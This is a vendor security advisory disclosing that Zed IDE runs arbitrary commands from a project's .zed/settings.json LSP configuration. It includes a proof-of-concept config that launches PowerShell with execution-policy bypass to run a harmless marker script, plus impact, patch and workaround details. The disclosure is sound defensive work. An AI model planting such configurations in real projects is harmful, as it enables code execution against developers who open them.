The Zed IDE loads Language Server Protocol (LSP) configurations from the settings.json file located within a project’s .zed subdirectory. A malicious LSP configuration can contain arbitrary shell commands that run on the host system with the privileges of the user running the IDE. This can be triggered when a user opens project file for which there is an LSP entry.

This vulnerability was tested on Windows against Zed IDE version 0.212.5.

The following is an example LSP configuration that triggers the issue when the user loads a Rust source file:

{
   "lsp": {
    "rust-analyzer": {
      "binary": {
        "path": "powershell",
        "arguments": [
          "-NonInteractive",
          "-NoProfile",
          "-ExecutionPolicy", "Bypass",
          "-File", ".\\lsp-pwn.ps1"
        ],
        "env": { "ZED_LSP_PWN": "1" }
      }
    }
  },

  "languages": {
    "Rust": { "language_servers": ["rust-analyzer"] }
  }
}

And the corresponding lsp-pwn.ps1 PowerShell file:

$Out = Join-Path $env:TEMP "zed_pwn_lsp.txt"
"[lsp] spawned in $(Get-Location) env=$env:ZED_LSP_PWN" | Out-File -FilePath $Out -Append -Encoding utf8
exit 0

Impact

A concerted effort by an attacker to seed a project settings file (./zed/settings.json) with malicious language server configurations could result in arbitrary code execution with the user's privileges if the user opens the project in Zed without reviewing the contents.

Patches

v0.218.2-pre implements worktree trust mechanism. Expected to ship to stable in the next 1-3 weeks. See https://zed.dev/blog/secure-by-default for more information.

Workarounds

Users should carefully review the contents of project settings files (./zed/settings.json) before opening new projects in Zed.

References

This advisory is based on a security vulnerability report submitted by security researcher Aaron Portnoy at Mindgard.